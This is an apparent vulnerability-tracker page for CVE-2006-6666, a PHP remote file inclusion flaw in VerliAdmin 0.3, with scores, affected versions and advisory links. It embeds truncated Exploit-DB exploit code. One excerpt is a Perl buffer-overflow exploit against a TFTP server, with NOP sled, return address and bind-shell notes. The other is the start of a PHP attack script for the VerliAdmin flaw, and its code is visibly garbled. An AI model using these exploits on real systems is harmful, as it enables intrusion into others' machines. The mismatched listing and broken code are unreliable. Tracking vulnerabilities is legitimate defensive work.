CVE-2006-6666
published 2006-12-20
CVE-2006-6666: PHP remote file inclusion vulnerability in index.php in VerliAdmin 0.3 and earlier allows remote authenticated users to execute arbitrary PHP code via a URL in…
Priority P3 · 40 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 2.45% (82.4th percentile)
PHP remote file inclusion vulnerability in index.php in VerliAdmin 0.3 and earlier allows remote authenticated users to execute arbitrary PHP code via a URL in the q parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| verliadmin | verliadmin | <= 0.3 | — |
No detection rules found.
Exploit-DB
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
exploitdb·2007-01-15
CVE-2006-4948 ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
---
```perl
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
    print "Usage: tftpdwin-0-4-2.pl \n\n";
    exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
    or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
my $nop0="\x90"x15;
#8BC3 MOV EAX,EBX
#66:05 1201 ADD AX,112
#50 PUSH EAX
#C3 RETN
my $asm="\x8b\xc3\x66\x05\x12\x01\x50\xc3";
my $nop="\x90"x57;
my $nop1="\x90"x7;
my $eip="\x42\xfb\x61\x40";# pop ebp,ret in tftpd.exe
#my $eip="B"x4;
#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the win
```
Exploit-DB
VerliAdmin 0.3 - 'index.php' Remote File Inclusion
exploitdb·2006-12-18
CVE-2006-6666 VerliAdmin 0.3 - 'index.php' Remote File Inclusion
---
```php
DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam http://www.rahim.webd.pl/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i 126 ))
   {$result.=" .";}
   else
   {$result.=" ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpackets($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (
```
No writeups or analysis indexed.
http://secunia.com/advisories/23418
http://www.securityfocus.com/bid/21640
http://www.vupen.com/english/advisories/2006/5059
https://www.exploit-db.com/exploits/2944
2006-12-20
Published